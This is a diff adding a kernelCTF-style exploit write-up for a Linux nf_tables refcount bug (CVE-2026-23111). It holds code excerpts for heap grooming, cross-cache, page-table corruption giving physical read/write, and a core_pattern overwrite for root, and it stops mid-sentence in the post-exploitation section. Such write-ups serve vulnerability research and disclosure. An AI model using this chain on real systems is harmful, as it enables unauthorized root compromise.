diff --git a/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/exploit.md new file mode 100644 index 000000000..ae3804758 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23111_cos/docs/exploit.md @@ -0,0 +1,608 @@ +# Exploit + +## 0. Table of Contents +- [Exploit](#exploit) + - [0. Table of Contents](#0-table-of-contents) + - [1. Background](#1-background) + - [2. Patch analysis](#2-patch-analysis) + - [3. Triggering the vulnerability (unbalanced refcount decrement)](#3-triggering-the-vulnerability-unbalanced-refcount-decrement) + - [4. Initialization for exploit](#4-initialization-for-exploit) + - [4.1 Disable buffering](#41-disable-buffering) + - [4.2 Setup namespaces](#42-setup-namespaces) + - [4.3 Pinning the CPU](#43-pinning-the-cpu) + - [5. Exploit for COS-121-18867.294.100 Instance](#5-exploit-for-cos-121-18867294100-instance) + - [5.1 Overview](#51-overview) + - [5.2 Preparation for object manipulation](#52-preparation-for-object-manipulation) + - [5.3 Heap grooming](#53-heap-grooming) + - [5.4 Triggering the vulnerability](#54-triggering-the-vulnerability) + - [5.5 Cross-cache from `kmalloc-cg-128` to `kmalloc-16`](#55-cross-cache-from-kmalloc-cg-128-to-kmalloc-16) + - [5.6 Detecting UAF'd `unix_address`](#56-detecting-uafd-unix_address) + - [5.7 Pivoting `unix_address` UAF into page UAF](#57-pivoting-unix_address-uaf-into-page-uaf) + - [5.8 Page table corruption for physical AARW](#58-page-table-corruption-for-physical-aarw) + - [5.9 Bypassing physASLR](#59-bypassing-physaslr) + - [5.10 Post exploitation](#510-post-exploitation) + - [6. Summary](#6-summary) + +## 1. Background + +Netfilter nf_tables is a modern packet filtering framework in Linux. It allows defining rules and actions for handling incoming and outgoing network packets. The subsystem consists of several key components: `table`, `chain`, `rule`, `expressions`, and `set`. At the top level, each `table` represents a distinct logical domain for packet filtering. Within a `table`, `chain` objects are defined as ordered sets of `rule`. + +A `set` stores unique elements such as addresses or port numbers. When a set has the `NFT_SET_MAP` flag, it acts as a verdict map, where each element maps a key to a verdict (e.g., `goto` or `jump` to a specific chain). A set element with the `NFT_SET_ELEM_CATCHALL` flag acts as a default match when no other element matches the lookup key. Verdict map elements that reference a chain via `NFT_GOTO` or `NFT_JUMP` increment the target chain's `use` reference count. + +nf_tables supports a transaction mechanism for commands. Multiple commands can be applied as a single batch through Netlink socket. If any command in the batch fails, the entire batch is aborted, and the abort path restores each component to its previous state. + +To interact with Netfilter nf_tables subsystem on the user program, [libmnl library](https://www.netfilter.org/projects/libmnl/) and the [libnftnl library](https://www.netfilter.org/projects/libnftnl/index.html) are commonly used. Our exploit also utilized these libraries. + +## 2. 
Patch analysis + +- [commit f41c5d151078c5348271ffaf8e7410d96f2d82f8](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f41c5d151078c5348271ffaf8e7410d96f2d82f8) + +```diff +diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c +--- a/net/netfilter/nf_tables_api.c ++++ b/net/netfilter/nf_tables_api.c +@@ -5914,7 +5914,7 @@ static void nft_map_catchall_activate(const struct nft_ctx *ctx, + + list_for_each_entry(catchall, &set->catchall_list, list) { + ext = nft_set_elem_ext(set, catchall->elem); +- if (!nft_set_elem_active(ext, genmask)) ++ if (nft_set_elem_active(ext, genmask)) + continue; + nft_clear(ctx->net, ext); +``` + +This patch fixes an inverted element activity check in `nft_map_catchall_activate()`. The function is called during the abort path to restore catchall elements that were deactivated during the prepare phase. The buggy version has opposite logic compared to its non-catchall counterpart `nft_mapelem_activate()`: it skips inactive elements (which need reactivation) and processes active elements instead. The fix simply removes the negation operator (`!`). + +The consequence is that when a `DELSET` operation is aborted, `nft_setelem_data_activate()` is never called for the catchall element. For `NFT_GOTO` verdict elements, this means `nft_data_hold()` is never called to restore the `chain->use` reference count, leading to an unbalanced refcount decrement and use-after-free. + +## 3. Triggering the vulnerability (unbalanced refcount decrement) + +In this section, we discuss how the inverted genmask check in `nft_map_catchall_activate()` causes an unbalanced refcount decrement and eventually leads to use-after-free. + +When a verdict map element references a chain via `NFT_GOTO`, the `nft_setelem_data_activate()` and `nft_setelem_data_deactivate()` functions manage the chain's `use` reference count. These are called during transaction prepare (deactivation) and abort (reactivation) phases. + +- [net/netfilter/nf_tables_api.c:nft_map_catchall_activate()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/nf_tables_api.c?h=v6.6) +```c +static void nft_map_catchall_activate(const struct nft_ctx *ctx, + struct nft_set *set) +{ + u8 genmask = nft_genmask_next(ctx->net); + struct nft_set_elem_catchall *catchall; + struct nft_set_elem elem; + struct nft_set_ext *ext; + + list_for_each_entry(catchall, &set->catchall_list, list) { + ext = nft_set_elem_ext(set, catchall->elem); + if (!nft_set_elem_active(ext, genmask)) // [1] BUG: inverted check + continue; + nft_clear(ctx->net, ext); + elem.priv = catchall->elem; + nft_setelem_data_activate(ctx->net, set, &elem); // [2] never reached for inactive catchall + break; + } +} +``` + +Compare this with the non-catchall counterpart `nft_mapelem_activate()`: +```c +static int nft_mapelem_activate(const struct nft_ctx *ctx, + struct nft_set *set, + const struct nft_set_iter *iter, + struct nft_set_elem *elem) +{ + nft_setelem_data_activate(ctx->net, set, elem); // always called + return 0; +} +``` + +The condition at [1] is inverted. For inactive catchall elements (those deactivated during `DELSET` prepare), `nft_set_elem_active()` returns `false`, so `!false` is `true`, and the function skips them via `continue`. Thus, `nft_setelem_data_activate()` [2] is never called for the element that needs reactivation. + +The following transaction sequence triggers the unbalanced refcount decrement: + +1. 
Create a table, a base chain, a verdict map `vmap`, and a non-base `target_chain`. +2. Add a catchall element to `vmap` with `goto target_chain` verdict. This increments `target_chain->use` to 1. +3. Send a batch containing: + - `DELSET(vmap)`: prepare phase succeeds; `nft_setelem_data_deactivate()` decrements `target_chain->use` to 0. + - `NEWRULE` on a non-existent chain: fails, causing the entire batch to abort. +4. During abort, `nft_map_catchall_activate()` is called but due to the inverted check [1], `nft_setelem_data_activate()` [2] is never called. The `target_chain->use` remains 0 instead of being restored to 1. + +- [exploit/cos-121-18867.294.100/exploit.c#L356](../exploit/cos-121-18867.294.100/exploit.c#L356) +```c +static void trigger_abort(struct mnl_nlmsg_batch *batch, uint32_t *seq, + int family, const char *table, + const char *set_name) +{ + /* Step 1: DELSET - prepare succeeds, catchall deactivated, chain->use-- */ + // ... (DELSET message) + + /* Step 2: NEWRULE on non-existent chain -> fails -> batch aborts */ + // ... (NEWRULE on "__nonexistent_chain__") +} +``` + +With `target_chain->use == 0`, a subsequent `DELCHAIN(target_chain)` succeeds and the chain object is freed, while the verdict map's catchall element still holds a stale pointer to it. + +## 4. Initialization for exploit +Before triggering the vulnerability, the exploit takes the following steps: +1. Disable buffering +2. Setup namespaces +3. Pinning the CPU + +### 4.1 Disable buffering +- [exploit/cos-121-18867.294.100/exploit.c#L619](../exploit/cos-121-18867.294.100/exploit.c#L619) +```c +setvbuf(stdin, 0, 2, 0); +setvbuf(stdout, 0, 2, 0); +setvbuf(stderr, 0, 2, 0); +``` +Disable buffering for `stdin`, `stdout`, and `stderr` with `setvbuf`. + +### 4.2 Setup namespaces +- [exploit/cos-121-18867.294.100/exploit.c#L638](../exploit/cos-121-18867.294.100/exploit.c#L638) +```c +unshare_setup(getuid(), getgid()); +``` +- [exploit/cos-121-18867.294.100/exploit.c#L417](../exploit/cos-121-18867.294.100/exploit.c#L417) +```c +void unshare_setup(uid_t uid, gid_t gid) +{ + int temp; + char edit[0x100]; + + unshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET); + + temp = open("/proc/self/setgroups", O_WRONLY); + write(temp, "deny", strlen("deny")); + close(temp); + + temp = open("/proc/self/uid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", uid); + write(temp, edit, strlen(edit)); + close(temp); + + temp = open("/proc/self/gid_map", O_WRONLY); + snprintf(edit, sizeof(edit), "0 %d 1", gid); + write(temp, edit, strlen(edit)); + close(temp); + + return; +} +``` +We create and enter user/network namespace with `unshare` syscall. This is necessary to trigger the vulnerability in the Netfilter nf_tables subsystem as an unprivileged user, since it requires `CAP_NET_ADMIN` capability. + +### 4.3 Pinning the CPU +- [exploit/cos-121-18867.294.100/exploit.c#L639](../exploit/cos-121-18867.294.100/exploit.c#L639) +```c +set_cpu_affinity(0, 0); +``` +- [exploit/cos-121-18867.294.100/exploit.c#L441](../exploit/cos-121-18867.294.100/exploit.c#L441) +```c +void set_cpu_affinity(int cpu_n, pid_t pid) { + cpu_set_t *set = malloc(sizeof(cpu_set_t)); + + CPU_ZERO(set); + CPU_SET(cpu_n, set); + + if (sched_setaffinity(pid, sizeof(set), set) < 0){ + perror("sched_setaffinity"); + return; + } + free(set); +} +``` +Pinning the current task to CPU core 0 with `sched_setaffinity` syscall. This is to maintain the exploit context in the same core to utilize the percpu slab cache and freelist. + +## 5. 
Exploit for COS-121-18867.294.100 Instance + +In this section, we discuss the exploit in detail for `cos-121-18867.294.100` instances. + +### 5.1 Overview +This exploit takes the following steps: +1. Preparation for object manipulation +2. Heap grooming +3. Triggering the vulnerability +4. Cross-cache #1: `kmalloc-cg-128` to `kmalloc-16` +5. Detecting UAF'd `unix_address` and triggering double free +6. Cross-cache #2: `kmalloc-16` to pipe page (page UAF) +7. Page table corruption for physical AARW +8. Bypassing physASLR +9. Post exploitation + +### 5.2 Preparation for object manipulation + +First, we initialize the message queues and socket arrays for heap spray. + +- [exploit/cos-121-18867.294.100/exploit.c#L663](../exploit/cos-121-18867.294.100/exploit.c#L663) +```c +init_msgq(defrag_msg_arr, DEFRAG_MSG_SPARY_SZ); +init_unix_sock(defrag_sock_arr, DEFRAG_SOCK_SPARY_SZ); + +init_msgq(cc_msg_arr1, CC_MSG_SPARY_SZ); +init_msgq(cc_msg_arr2, CC_MSG_SPARY_SZ); +init_unix_sock(server_sock_arr, RECLAIM_SOCK_SPARY_SZ); +init_unix_sock(client_sock_arr, RECLAIM_SOCK_SPARY_SZ); +init_unix_sock(reclaim_sock_arr, RECLAIM_SOCK_SPARY_SZ); + +for (int i = 0; i < PIPE_SPARY_SZ; i++) { + if (pipe2(pipe_arr[i], O_NONBLOCK) < 0) { + perror("init pipe"); + for(;;); + } +} +``` + +Each object array performs the following roles: +- `defrag_msg_arr` / `defrag_sock_arr`: Used for defragmenting `kmalloc-16` slab cache before reclamation. +- `cc_msg_arr1` / `cc_msg_arr2`: `msg_msg` objects (0x80 bytes) sprayed in `kmalloc-cg-128` surrounding the victim `nft_chain` object. Freeing these helps return the slab page to the page allocator for cross-cache. +- `server_sock_arr` / `client_sock_arr`: Unix sockets whose `unix_address` objects (16 bytes, in `kmalloc-16`) reclaim the freed chain's page. +- `pipe_arr`: Pipe pairs used to create pipe buffer pages that will overlap with page tables. + +### 5.3 Heap grooming + +- [exploit/cos-121-18867.294.100/exploit.c#L684](../exploit/cos-121-18867.294.100/exploit.c#L684) + +We create the nf_tables objects in a specific order to sandwich the `target_chain` allocation between `msg_msg` spray objects in `kmalloc-cg-128`. + +```c +/* Phase 1a: table + base chain + verdict map */ +add_table(b, &seq, family, table); +add_chain(b, &seq, family, table, bchain, true); +add_verdict_map(b, &seq, family, table, mapname, mapid); +``` + +- [exploit/cos-121-18867.294.100/exploit.c#L705](../exploit/cos-121-18867.294.100/exploit.c#L705) +```c +/* Phase 1b-d: spray msg_msg, create chain, spray more msg_msg */ +spray_msgsnd(cc_msg_arr1, CC_MSG_SPARY_SZ, MSG_MSG_SIZE, msg_msg_buf, 1, 2); // [1] +ret = send_batch_and_recv(b); // target_chain allocated here +spray_msgsnd(cc_msg_arr2, CC_MSG_SPARY_SZ, MSG_MSG_SIZE, msg_msg_buf, 1, 2); // [2] +``` + +We spray `CC_MSG_SPARY_SZ` (0x400) `msg_msg` objects of size `MSG_MSG_SIZE` (0x80) before [1] and after [2] the `target_chain` creation. `msg_msg` at 0x80 bytes (including 48-byte header) occupies `kmalloc-cg-128`. This places the chain object in between two blocks of `msg_msg` objects on the same slab page, which is critical for the cross-cache step later. + +- [exploit/cos-121-18867.294.100/exploit.c#L725](../exploit/cos-121-18867.294.100/exploit.c#L725) +```c +/* Phase 1e: add catchall element with goto verdict */ +add_catchall_elem_raw(b, &seq, family, table, mapname, mapid, tchain); +``` + +We add a catchall element to the verdict map with a `goto target_chain` verdict. This increments `target_chain->use` to 1. 
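+
+For reference, the following is a minimal, self-contained sketch of the `kmalloc-cg-128` `msg_msg` spray used above. It assumes a 48-byte `struct msg_msg` header on x86_64 (the exploit's `spray_msgsnd()` reads the exact header size from the kernelXDK target database), so a payload of `0x80 - 48` bytes makes each allocation exactly 0x80 bytes:
+
+```c
+#include <string.h>
+#include <sys/ipc.h>
+#include <sys/msg.h>
+
+#define MSG_MSG_HDR  48      /* assumed sizeof(struct msg_msg) on x86_64 v6.6 */
+#define SPRAY_CNT    0x400   /* matches CC_MSG_SPARY_SZ */
+
+/* Spray SPRAY_CNT msg_msg objects of total size 0x80 into kmalloc-cg-128. */
+static void spray_kmalloc_cg_128(int *qids)
+{
+    struct { long mtype; char mtext[0x80 - MSG_MSG_HDR]; } m = { .mtype = 2 };
+
+    memset(m.mtext, 0, sizeof(m.mtext));
+    for (int i = 0; i < SPRAY_CNT; i++) {
+        qids[i] = msgget(IPC_PRIVATE, 0644 | IPC_CREAT);
+        msgsnd(qids[i], &m, sizeof(m.mtext), 0);  /* one 0x80-byte msg_msg per queue */
+    }
+}
+```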
+ +### 5.4 Triggering the vulnerability + +- [exploit/cos-121-18867.294.100/exploit.c#L746](../exploit/cos-121-18867.294.100/exploit.c#L746) +```c +/* DELSET(vmap) + NEWRULE(fail) -> abort */ +trigger_abort(b, &seq, family, table, mapname); +ret = send_batch_and_recv(b); +``` + +We send the abort-triggering batch described in [Section 3](#3-triggering-the-vulnerability-unbalanced-refcount-decrement). After the batch aborts, `target_chain->use == 0`. + +### 5.5 Cross-cache from `kmalloc-cg-128` to `kmalloc-16` + +The `nft_chain` object is allocated in `kmalloc-cg-128`. To reclaim the freed chain's memory with a different object type, we perform a cross-cache attack to move the underlying slab page from `kmalloc-cg-128` to `kmalloc-16`. + +- [include/net/af_unix.h:struct unix_address](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/net/af_unix.h?h=v6.6) +```c +struct unix_address { + refcount_t refcnt; // [1] 4 bytes + int len; // [2] 4 bytes + struct sockaddr_un name[]; +}; +``` + +The `unix_address` object is allocated when `bind()` is called on a unix socket (via `unix_create_addr()`). Its size is `sizeof(unix_address)` (8 bytes) + the address length. We use `addr_len = 0x10 - sizeof(struct unix_address) = 8`, making the total allocation 16 bytes, thus placing it in `kmalloc-16`. + +The `unix_address` refcount lifecycle is managed by three operations: + +- [net/unix/af_unix.c:unix_create_addr()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/unix/af_unix.c?h=v6.6) +```c +static struct unix_address *unix_create_addr(struct sockaddr_un *sunaddr, int addr_len) +{ + struct unix_address *addr; + addr = kmalloc(sizeof(*addr) + addr_len, GFP_KERNEL); + // ... + refcount_set(&addr->refcnt, 1); // [1] initialized to 1 on bind() + return addr; +} +``` + +- [net/unix/af_unix.c:unix_stream_connect()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/unix/af_unix.c?h=v6.6) +```c + refcount_inc(&otheru->addr->refcnt); // [2] +1 when client connects + smp_store_release(&newu->addr, otheru->addr); +``` + +- [net/unix/af_unix.c:unix_release_addr()](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/unix/af_unix.c?h=v6.6) +```c +static inline void unix_release_addr(struct unix_address *addr) +{ + if (refcount_dec_and_test(&addr->refcnt)) // [3] -1; kfree when 0 + kfree(addr); +} +``` + +On `bind()`, `refcnt` is initialized to 1 [1]. When a client calls `connect()`, `unix_stream_connect()` increments `refcnt` to 2 [2] as the child socket shares the listener's address. On socket destruction, `unix_sock_destructor()` calls `unix_release_addr()` [3] to drop one reference; the last decrement triggers `kfree()`. 
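+
+Putting the lifecycle together, it can be reproduced with a few lines of userspace code. Below is a minimal sketch (not exploit code): the 8-byte address length is chosen so that `sizeof(struct unix_address) + 8 = 16` places the object in `kmalloc-16`, and the comments describe the expected refcount transitions on v6.6:
+
+```c
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <unistd.h>
+
+int main(void)
+{
+    struct sockaddr_un a = { .sun_family = AF_UNIX };  /* sun_path[0] == '\0': abstract namespace */
+    socklen_t addr_len = 8;       /* sizeof(struct unix_address) + 8 == 16 -> kmalloc-16 */
+    int srv = socket(AF_UNIX, SOCK_STREAM, 0);
+    int cli = socket(AF_UNIX, SOCK_STREAM, 0);
+    int child;
+
+    memcpy(&a.sun_path[1], "tag", 3);                  /* short name within the 8-byte address */
+
+    bind(srv, (struct sockaddr *)&a, addr_len);        /* unix_create_addr(): refcnt = 1 */
+    listen(srv, 1);
+    connect(cli, (struct sockaddr *)&a, addr_len);     /* unix_stream_connect(): refcnt = 2 */
+    child = accept(srv, NULL, NULL);
+
+    close(child);  /* child sock stays alive while the client still peers with it */
+    close(cli);    /* tears down the child sock: unix_release_addr(), refcnt 2 -> 1 */
+    close(srv);    /* last reference: refcnt 1 -> 0, kfree() of the unix_address */
+    return 0;
+}
+```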
+ +- [exploit/cos-121-18867.294.100/exploit.c#L760](../exploit/cos-121-18867.294.100/exploit.c#L760) +```c +struct sockaddr_un un_addr; +size_t addr_len = 0x10 - sizeof(struct unix_address); +memset(&un_addr, 0, sizeof(struct sockaddr_un)); +un_addr.sun_family = AF_UNIX; +un_addr.sun_path[0] = '\0'; // abstract namespace +``` + +Now we perform the `DELCHAIN` and cross-cache reclamation sequence: + +- [exploit/cos-121-18867.294.100/exploit.c#L768](../exploit/cos-121-18867.294.100/exploit.c#L768) +```c +/* Step 1: Prepare DELCHAIN batch */ +del_chain(b, &seq, family, table, tchain); + +/* Step 2: Defragment kmalloc-16 with unix_address objects */ +for (int i = 0; i < DEFRAG_SOCK_SPARY_SZ; i++) { + *(size_t *)(&un_addr.sun_path[1]) = i + 1; + bind(defrag_sock_arr[i], (struct sockaddr *)&un_addr, addr_len); // [1] +} + +/* Step 3: Free surrounding msg_msg to release slab page */ +release_msg(cc_msg_arr1, CC_MSG_SPARY_SZ); // [2] +release_msg(cc_msg_arr2, CC_MSG_SPARY_SZ); // [3] + +/* Step 4: Send DELCHAIN - chain object is freed */ +ret = send_batch_and_recv(b); // [4] + +/* Step 5: Reclaim with unix_address objects */ +for (int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++) { + *(size_t *)(&un_addr.sun_path[1]) = i + 1 + UNIX_MAGIC_ADDR; // [5] + bind(server_sock_arr[i], (struct sockaddr *)&un_addr, addr_len); +} +``` + +The steps are: +1. Defragment `kmalloc-16` slab [1] by allocating `DEFRAG_SOCK_SPARY_SZ` (0x200) `unix_address` objects. This ensures subsequent `kmalloc-16` allocations come from fresh pages. +2. Free all `msg_msg` objects surrounding the chain [2][3]. With the chain freed at [4] and the surrounding objects also freed, the slab page is returned to the page allocator. +3. Allocate `RECLAIM_SOCK_SPARY_SZ` (0x400) `unix_address` objects [5] with names containing `UNIX_MAGIC_ADDR` (0xdeadbeef) marker plus an index. These `kmalloc-16` allocations reclaim pages from the page allocator, including the page that previously held the chain object. + +We then connect client sockets to server sockets to increase the `unix_address` refcount: +- [exploit/cos-121-18867.294.100/exploit.c#L806](../exploit/cos-121-18867.294.100/exploit.c#L806) +```c +for (int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++) { + listen(server_sock_arr[i], 2); + *(uintptr_t *)(&un_addr.sun_path[1]) = i + 1 + UNIX_MAGIC_ADDR; + connect(client_sock_arr[i], (struct sockaddr*)&un_addr, addr_len); // [1] + tmp_sock = accept(server_sock_arr[i], NULL, NULL); + close(tmp_sock); +} + +/* Cleanup: delete the table, which destroys the verdict map */ +del_table(b, &seq, family, table); +send_batch_and_recv(b); +``` + +Connecting the client socket to the server socket [1] increments the server's `unix_address->refcnt` from 1 to 2. This is critical for what follows. + +When the table is deleted, the verdict map and its catchall element are destroyed. The catchall element's `goto` verdict still references the stale chain pointer, which now overlaps with a `unix_address` object. During destruction, `nft_data_release()` performs a UAF access on the stale chain pointer to decrement what it thinks is `chain->use`. However, this field overlaps with `unix_address->refcnt`, causing the refcount to drop from 2 to 1. This creates a refcount imbalance: the `unix_address` has two references (server socket + client socket) but a refcount of only 1. 
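+
+The stale dereference itself happens in the verdict-release path of the set element destruction: `nft_data_release()` dispatches verdict data to `nft_verdict_uninit()`, shown below in simplified (paraphrased, not verbatim) form from `net/netfilter/nf_tables_api.c` (v6.6):
+
+```c
+static void nft_verdict_uninit(const struct nft_data *data)
+{
+    struct nft_chain *chain;
+
+    switch (data->verdict.code) {
+    case NFT_JUMP:
+    case NFT_GOTO:
+        chain = data->verdict.chain;  /* stale pointer into the reclaimed kmalloc-16 page */
+        nft_use_dec(&chain->use);     /* decrements what is now unix_address->refcnt */
+        break;
+    }
+}
+```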
+ +### 5.6 Detecting UAF'd `unix_address` and triggering double free + +To identify which server socket has the refcount-corrupted `unix_address` and trigger the double free, we close each client socket and probe with `getsockname()`. + +- [exploit/cos-121-18867.294.100/exploit.c#L846](../exploit/cos-121-18867.294.100/exploit.c#L846) +```c +int uaf_idx = -1; +for (int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++) { + close(client_sock_arr[i]); // [1] + getsockname(server_sock_arr[i], (struct sockaddr *)&uaf_addr, &uaf_addr_len); + ret = *(uintptr_t *)(&uaf_addr.sun_path[1]); + if (ret - UNIX_MAGIC_ADDR != i + 1) { // [2] + uaf_idx = i; + } +} +``` + +Closing the client socket [1] drops one reference to the `unix_address`. For the corrupted `unix_address` (whose refcount was lowered from 2 to 1 by the UAF), this drops the refcount to 0, causing the `unix_address` to be freed, even though the server socket still holds a reference. We detect this by checking `getsockname()` [2]: if the returned name no longer matches the expected `UNIX_MAGIC_ADDR + index`, the `unix_address` was prematurely freed, and we record that socket index as `uaf_idx`. + +### 5.7 Pivoting `unix_address` UAF into page UAF + +We now pivot the `unix_address` UAF into a page-level UAF by leveraging the freed page. + +- [exploit/cos-121-18867.294.100/exploit.c#L866](../exploit/cos-121-18867.294.100/exploit.c#L866) +```c +/* Step 1: Close all server sockets except the UAF one */ +for (int i = 0; i < RECLAIM_SOCK_SPARY_SZ; i++) + if (i != uaf_idx) close(server_sock_arr[i]); + +/* Step 2: Spray pipe pages with known pattern */ +int *curr = (int *)pipe_buf; +for (int i = 0; i < sizeof(pipe_buf) / sizeof(int); i++) + curr[i] = 1; + +for (int i = 0; i < PIPE_SPARY_SZ; i++) { + write(pipe_arr[i][1], pipe_buf, PG_SIZE); // [1] +} + +/* Step 3: mmap large region for page table spray */ +addr = mmap((void *)MMAP_ADDR, MMAP_SZ, PROT_READ | PROT_WRITE, + MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED, -1, 0); +madvise((void *)MMAP_ADDR, MMAP_SZ, MADV_NOHUGEPAGE); // [2] +``` + +We write a full page of `0x00000001` pattern (as `int`) to each pipe [1]. The value `1` is chosen deliberately: if a pipe buffer page overlaps with a `unix_address` object, it overwrites `refcnt` to 1. This means closing the server socket will drop the refcount to 0 and trigger `kfree()`, resulting in a invalid double free. The pipe writes also drain the PCP (per-cpu page) buddy list for order-0 pages, ensuring that subsequent pipe buffer and page table allocations compete for the same pages. We also `mmap` a large contiguous region (`PT_SPRAY_SZ * MMAP_GAP` = 0x100 * 0x200000 = 512 MB) and set `MADV_NOHUGEPAGE` [2] to ensure 4K page table entries instead of huge pages. + +- [exploit/cos-121-18867.294.100/exploit.c#L886](../exploit/cos-121-18867.294.100/exploit.c#L886) +```c +/* Step 4: Close the UAF server socket - triggers page free */ +close(server_sock_arr[uaf_idx]); // [1] + +/* Step 5: Touch pages in mmap region - allocates page tables */ +for (int i = 0; i < PT_SPRAY_SZ; i++) { + *(uintptr_t *)((uintptr_t)addr + MMAP_GAP * i) = i + 1; // [2] +} +``` + +Closing the UAF server socket [1] triggers `unix_sock_destructor()`, which calls `unix_release_addr()` on the `unix_address` whose `refcnt` was overwritten to 1 by the pipe spray. This decrements the refcount to 0 and calls `kfree()` on the `unix_address`. 
However, this `kfree()` is an invalid free: the `unix_address`'s slab page has already been drained and returned to the page allocator, and the page is now occupied by pipe buffer pages. The SLUB allocator processes this invalid `kfree()` and frees one of the pipe buffer pages back to the page allocator (see [Novel Techniques: Exploiting unexpected behavior of invalid address kfree](novel-techniques.md#exploiting-unexpected-behavior-of-invalid-address-kfree) for details). Each first memory access at a 2MB-aligned virtual address [2] then allocates a new page table (PTE page) from the page allocator. One of these PTE pages lands on the freed pipe buffer page, creating a pipe buffer / page table overlap. + +### 5.8 Page table corruption for physical AARW + +We now have a pipe buffer and a page table sharing the same physical page. Reading the pipe gives raw PTE entries; writing to the pipe overwrites them. + +- [exploit/cos-121-18867.294.100/exploit.c#L893](../exploit/cos-121-18867.294.100/exploit.c#L893) +```c +for (int i = 0; i < PIPE_SPARY_SZ; i++) { + read(pipe_arr[i][0], tmp_buf, PG_SIZE); + if (*((int *)tmp_buf) != 0x1) { // [1] + pte = *((uintptr_t *)tmp_buf); // [2] + pt_idx = i; + *((uintptr_t *)tmp_buf) = pte - 0x4000; // [3] + write(pipe_arr[i][1], tmp_buf, PG_SIZE); // [4] + flush_tlb(MMAP_ADDR, MMAP_SZ); + break; + } +} +``` + +We iterate through all pipes and read their contents. If the read data is not our `0x00000001` pattern [1], it contains PTE values [2], meaning this pipe's buffer page overlaps a page table. We then modify the first PTE to point `0x4000` (4 pages) earlier in physical memory [3] and write it back [4], creating a mapping to a different physical page. + +- [exploit/cos-121-18867.294.100/exploit.c#L917](../exploit/cos-121-18867.294.100/exploit.c#L917) +```c +for (int i = 0; i < PT_SPRAY_SZ; i++) { + ret = *(uintptr_t *)((uintptr_t)addr + MMAP_GAP * i); + if (ret != i + 1) { // [1] + pt_addr = (uintptr_t)addr + MMAP_GAP * i; // [2] + break; + } +} +``` + +We find the corrupted virtual address by scanning the mmap region [1]. The virtual address at `pt_addr` [2] now maps to a different physical page than originally intended. We use this address as the window for physical memory access. + +With the pipe as our PTE read/write channel, we build `aar()` and `aaw()` helper functions for arbitrary physical read/write: + +- [exploit/cos-121-18867.294.100/exploit.c#L500](../exploit/cos-121-18867.294.100/exploit.c#L500) +```c +void aar(int fd[], void *virt_dst, void *phys_src, void *corrupted_addr, size_t len) +{ + // 1. Read current PTE page via pipe + read(fd[0], tmp, PG_SIZE); + flags = tmp[0] & 0xfff; + + // 2. Construct PTE pointing to target physical address + for (i = 0; i < num_pages; ++i) { + tmp[i] = flags | p | 0x8000000000000000; // present + target phys addr + p += PG_SIZE; + } + + // 3. Write modified PTE page via pipe + write(fd[1], tmp, PG_SIZE); + + // 4. 
Flush TLB and read through the remapped virtual address + flush_tlb(corrupted_addr, len); + memcpy(virt_dst, corrupted_addr + offset, len); +} +``` + +The `flush_tlb` function uses `mprotect` and `clflush` to ensure the TLB is flushed: +- [exploit/cos-121-18867.294.100/exploit.c#L473](../exploit/cos-121-18867.294.100/exploit.c#L473) +```c +void flush_tlb(void *ptr, size_t count) { + mprotect(ptr, count, PROT_READ | PROT_WRITE | PROT_EXEC); + mprotect(ptr, count, PROT_READ | PROT_WRITE); + sched_yield(); + asm volatile("clflush 0(%0)\n" : : "c"(ptr) : "rax"); +} +``` + +### 5.9 Bypassing physASLR + +With physical AARW established, we need to locate the kernel in physical memory. Physical ASLR (physASLR) randomizes the kernel's physical load address. We bypass this with a simple linear scan. Refer to [Effective bypass of physASLR section of novel-techniques.md](./novel-techniques.md#effective-bypass-of-physaslr) for details on why this works. + +- [exploit/cos-121-18867.294.100/exploit.c#L927](../exploit/cos-121-18867.294.100/exploit.c#L927) +```c +#define CORE_PATTERN_PHYS_ADDR 0x3fb3440 +int cnt = 0; +while (1) { + aar(pipe_arr[pt_idx], tmp_buf, + CORE_PATTERN_PHYS_ADDR + cnt * 0x1000000, // [1] + pt_addr, PG_SIZE); + char *core_pattern_addr = (char *)(pt_addr + (CORE_PATTERN_PHYS_ADDR & 0xfff)); + if (!strcmp(core_pattern_addr, "core")) { // [2] + strcpy(core_pattern_addr, "|/proc/%P/fd/666 %P %P"); // [3] + // write back modified PTE, flush TLB + break; + } + cnt++; +} +``` + +`CORE_PATTERN_PHYS_ADDR` (0x3fb3440) is the offset of `core_pattern` from the kernel physical base on the target COS image. We scan candidate base addresses at 16 MB (0x1000000) intervals [1] by reading one page at each candidate physical address. When the page contains the expected `"core"` string [2], we have found the kernel image and overwrite it with our `core_pattern` payload [3]. + +### 5.10 Post exploitation + +After overwriting `core_pattern`, we use it to execute code as root. + +- [exploit/cos-121-18867.294.100/exploit.c#L577](../exploit/cos-121-18867.294.100/exploit.c#L577) +```c +void crash(char *cmd) +{ + int memfd = memfd_create("", MFD_EXEC); + sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff); // [1] + dup2(memfd, 666); // [2] + close(memfd); + sleep(1); + while (check_core() == 0) { + sleep(1); + } + *(size_t *)0 = 0; // [3] trigger crash +} +``` + +- [exploit/cos-121-18867.294.100/exploit.c#L962](../exploit/cos-121-18867.294.100/exploit.c#L962) +```c +if (fork() == 0) { + set_cpu_affinity(1, 0); + setsid(); + crash(""); + for(;;); +} +``` + +The exploit forks a child process which: +1. Creates a `memfd` and copies the exploit binary itself into it [1]. +2. Duplicates the memfd to file descriptor 666 [2]. +3. Waits for `core_pattern` to be overwritten, then triggers a null pointer dereference [3]. + +When the crash occurs, the kernel reads `core_pattern` which is now 